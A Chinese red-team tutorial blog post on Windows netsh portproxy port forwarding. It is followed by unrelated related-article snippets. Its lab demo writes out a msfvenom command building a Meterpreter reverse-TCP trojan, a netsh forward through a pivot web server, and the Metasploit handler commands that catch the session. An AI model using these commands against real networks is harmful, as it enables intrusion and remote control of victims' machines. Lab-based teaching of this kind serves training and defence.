红队隧道应用篇之Netsh端口转发

news2024/11/14 1:03:29

简介

netsh是从Windows 2000开始就有的一个用于配置网络设备的命令行工具

其中netsh interface portproxy是一个配置网络代理的命令, 可以配置ipv4或ipv6的端口转发代理以及双向端口转发代理

学习隧道应用前必须了解的知识:https://blog.csdn.net/xf555er/article/details/128210661

常用功能

添加端口转发(管理员权限)

下述命令的意思是, 若有TCP的链接发送至本机(127.0.0.1)的80端口时, 会将链接转发至目标地址(192.168.52.148)的指定端口(80)

netsh interface portproxy add v4tov4 listenport=80 connectport=80 connectaddress=192.168.52.148

add v4tov4: 添加一条ipv4至ipv4的端口转发记录

listenport: 本机的监听端口

listenaddress: 本机的监听地址, 不填默认为本机地址

connectport: 目标端口

connectaddress: 目标地址


删除端口转发(管理员权限)

netsh interface portproxy delete v4tov4 listenport=80 listenaddress=127.0.0.1

delete v4tov4: 删除一条ipv4到ipv4的端口转发记录


查看所有的端口转发规则

netsh interface portproxy show all

清除所有的端口转发规则

netsh interface portproxy reset

http端口转发

环境拓扑图

由于攻击机(192.168.47.133)和内网主机(192.168.52.148)不在同一个网段上, 因此攻击机不能访问到内网主机web服务的80端口

但是可以通过在Web服务器使用netsh命令将本机的80端口收到的数据转发给内网主机, 来实现攻击机只需访问Web服务器的80端口就能访问到内网主机的80端口

image-20221023220316159


操作步骤

在Web服务器使用管理员权限执行以下cmd命令, 意思是将本机80端口的数据转发至192.168.52.148的80端口

netsh interface portproxy add v4tov4 listenport=80 connectport=80 connectaddress=192.168.52.148

image-20221023214440534


随后攻击机访问Web服务器192.168.47.149:80, 即可访问到内网主机的Web服务

1


MSF实战演示

环境拓扑图

Kali通过将Web服务器作为一个跳板, 将生成的反向木马发送至内网主机, 内网主机运行木马后会主动连接Web服务器, Web服务器通过端口转发功能将内网主机的连接数据转发至kali

image-20221024105351598


操作步骤

在kali生成一个反向木马用于让内网主机主动连接Web服务器的5555端口, 然后将此木马放到内网主机中去

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.143 lport=5555 -f exe >reverse.exe

image-20221023234859524


在Web服务器设置端口转发, 将本机5555端口接收到的数据转发至kali的5555端口

netsh interface portproxy add v4tov4 listenport=5555 connectport=5555 connectaddress=192.168.47.134

image-20221024103853543


在kali的MSF创建监听,监听本机的5555端口

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.47.134
lhost => 192.168.47.134
msf5 exploit(multi/handler) > set lport 5555
lport => 5555
msf5 exploit(multi/handler) > exploit

在内网主机运行木马后, 随后会在MSF返回内网主机的meterpreter会话

image-20221024104154551

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/67658.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

LeetCode刷题复盘笔记—一文搞懂完全背包之279. 完全平方数问题(动态规划系列第十五篇)

今日主要总结一下动态规划完全背包的一道题目,279. 完全平方数 题目:279. 完全平方数 Leetcode题目地址 题目描述: 给你一个整数 n ,返回 和为 n 的完全平方数的最少数量 。 完全平方数 是一个整数,其值等于另一个整…

技术开发93

技术开发93 业务内容: . 马达零部件 . 汽车零部件 . 音响用零部件 . 农用机零部件 . 建筑模具 公司简介: 资本金:2000万日元(约120万元人民币) 员工数:17名 成立时间:1923年4月 资格认…

Linux文件及目录管理操作

Linux文件及目录管理实验目的及要求1.了解Linux文件与目录的访问权限2.熟悉Linux文件与目录的打包和压缩3.掌握Linux文件与目录的相关管理操作实验原理实验步骤对文件管理和压缩归档进行了解,具体步骤如下:1.用mkdir命令在"/root"目录下创建一…

[附源码]Python计算机毕业设计Django线上社区管理系统

项目运行 环境配置: Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术: django python Vue 等等组成,B/S模式 pychram管理等等。 环境需要 1.运行环境:最好是python3.7.7,…

C#语言入门详解 第十七讲 (字段、属性、索引器、常量)

C#语言入门详解 第十七讲 (字段、属性、索引器、常量) 在C#语言中,类(或结构体)包含以下成员: 什么是字段 字段(field)是一种表示与对象或类型(类与结构体&#xff0…

【传输层】概述、复用分用、UDP详解、UDP校验

文章目录传输层概述----为应用层服务TCP靠谱--大文件、时延大 与UDP不可靠--小文件、时延小传输层的寻址与端口------复用---应用层所有进程通过传输层再传输到网络层----------分用---------传输层从网络层收到数据后交付给指定应用程序套接字------Socket---IP:端…

足球冷知识:球队之间比分相同,怎么排名?

在足球比赛的小组赛中,往往会有胜、平、负三种结局,球队胜一场得三分、平一场得一分、输一场不得分。 如果球队积分相同,排名的时候,还会通过净胜球(就是进球数减丢球数)、相互交战的成绩、总进球数、球队累…

2023年天津美术学院专升本专业课报名缴费时间及考试安排

天津美术学院2023 年高职升本专业考试报名考试公告 一、报名时间 2022 年 12 月 9 日 10:00 至 12 月 12 日 17:00(逾期不予补报,考生也不得再修改报名信息) 注:每日 23:00 至次日 7:00 是报名系统维护时间,届时报名相…

搭建Python虚拟环境

搭建Python虚拟环境虚拟环境概述安装虚拟环境Windows环境下Linux环境下创建虚拟环境使用虚拟环境虚拟机环境下安装包PyCharm中使用虚拟环境虚拟环境 概述 为什么需要搭建Python的虚拟环境? 正常情况下,在一台电脑上, 想开发多个不同的项目, 需要用到同…

【GNN基础学习】图模块基本定义 || 图的邻接矩阵 || GNN中常见任务有哪些? || GNN消息传递方法 || 多层GCN有什么作用?

声明:仅学习使用~ 目录 一、图模块基本定义二、图的 邻接矩阵三、GNN中常见任务:点级别 任务、边级别 任务、图级别 任务。四、消息传递方法五、多层GCN的作用一、图模块基本定义 点、边、图。 对点的特征、边的特征、图的特征 等都要做重构。 借助于 图 这一结构,对事物…

39. 组合总和

39. 组合总和 给你一个 无重复元素 的整数数组 candidates 和一个目标整数 target ,找出 candidates 中可以使数字和为目标数 target 的 所有 不同组合 ,并以列表形式返回。你可以按 任意顺序 返回这些组合。 candidates 中的 同一个 数字可以 无限制重…

C++并发编程

目录一、并发编程相关的基础概念1、操作系统(Linux)2、任务和通信3、多进程和多线程4、C中的多线程发展史二、pthread线程使用讲解和实战1、pthread基本使用2、线程的分离3、线程属性4、关于线程的几个值得注意的点三、线程的同步之互斥锁、读写锁、非阻…

MySQL 数据库主从复制

参考视频教程: https://www.bilibili.com/video/BV13a411q753?p172 参考博客: https://blog.csdn.net/main_Scanner01/article/details/124259050 1. 介绍 1.1 要点 主库(master): 负责增删改 从库(slave) : 负责查询 主从库关系: 一对多 1.2 步骤 ● master将改变记录到_…

宝塔部署node项目

宝塔linux:是一个linux运维面板,方便管理服务器。 安装服务器默认宝塔面板 使用步骤 到防火墙页面开启8888端口: 点击进入防火墙远程登录服务器。复制面板安全入口查询命令,获取面板安全入口。sudo /etc/init.d/bt default | gr…

快速入门Docker

目录 Docker简介 Dokcer环境配置 Docker HelloWorld运行原理解析 阿里云镜像仓库 常用命令 基本命令 镜像命令 容器命令 Docker简介 Docker 是基于Go语言实现的一个开源项目,通过对应组建的封装,分发,部署,运行等生命周期的管…

如何创建多语言WordPress网站[专家建议]

如果您想有效地接触广泛的国际受众,那么您应该考虑制作一个多语言WordPress网站。您知道吗,61.1% 的网站是英文的,但全球只有 25.9% 的用户实际上可以在线使用这种语言。 多语言功能意味着创建站点的两个或多个语言实例,在大多数…

anaconda安装pytorch

1.需不需要另外创建一个新环境 答案是:可以不需要 所以我的做法是直接在base环境中安装的pytorch 2.python、torch、torchvision版本对应 我的是python3.9,安装的是cuda11.3–torch1.10.1,所以按理来说torchvision为0.11.2 3.离线安装tor…

P4的exercises实现原理

今天介绍一下p4的tutorials-master\utils如何将tutorials-master\exercises下各个小实验的实现,有助于以后自己构建mininet并配置p4交换机,通过本博客可以简单了解: Makefile是如何实现相关的实验的基于p4的mininet如何搭建 1.Makefile干了什…

python-(6-4-3)爬虫---re解析案例

文章目录一 需求二 总体思路1)从网址定位到2022必看热片2)从2022必看热片定位到子页面的链接地址3)请求子页面的链接地址,拿到我们想要的下载地址三 分析步骤1)从网址定位到2022必看热片2)从2022必看热片定…

开关电源环路稳定性分析(05)-传递函数

大家好,这里是大话硬件。 经过前面4篇文章的梳理,估计很多人已经等不及了,什么时候可以开始环路的分析。为了尽快进入到大家关心的部分,这一讲我们正式进入环路分析的第一部分——传递函数。 传递函数,简单的理解就是…